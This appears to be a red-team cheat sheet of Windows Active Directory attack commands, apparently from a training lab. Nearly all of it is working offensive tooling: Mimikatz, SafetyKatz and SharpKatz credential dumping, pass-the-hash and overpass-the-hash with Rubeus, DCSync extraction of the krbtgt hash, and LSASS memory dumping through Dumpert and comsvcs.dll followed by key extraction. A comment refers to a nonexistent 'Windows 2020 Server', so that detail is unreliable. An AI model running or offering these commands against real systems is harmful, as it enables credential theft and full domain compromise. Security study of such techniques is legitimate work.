Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
# Invoke-Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntImhash> /run:powershell.exe"'
# Invoke-Mimikatz using AES
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"'
# SafetyKatz
SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"
# The above commands starts a PowerShell session with a logon type 9 (same as runas /netonly).
# Rubeus.exe
# Below doesn't need elevation
Rubeus.exe asktgt /user:administrator /rc4: /ptt
# Below command needs elevation
Rubeus.exe asktgt /user:administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
- To extract credentials from the DC without code execution on it, we can use DCSync
- To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for us domain
- By default, Domain Admins privileges are required to run DCSync
# Invoke-Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'
# SafetyKatz
SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
# SafetyKatz Old (For Windows 2020 Server)
SafetyKatz_old.exe "lsadump::dcsync /user:us\krbtgt" "exit"
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
SafetyKatz.exe -Command "sekurlsa::ekeys" "exit"
# SafetyKatz Old (For Windows 2020 Server)
SafetyKatz_old.exe -Command "sekurlsa::ekeys" "exit"
SharpKatz.exe -Command ekeys
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump
pypykatz.exe live lsa
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass process ID> C:\Users\Public\lsass.dmp full
Now Extract the creds from lsass dump
# Run mimikatz
# set the location of the lsass dump
sekurlsa::minidump C:\AD\Tools\lsass.DMP
# get the debug privs
privilege::debug
# now get the ekeys
sekurlsa::ekeys
SharpKatz.exe --Command dcsync --User us\krbtgt --Domain us.techcorp.local --DomainController us-dc.us.techcorp.local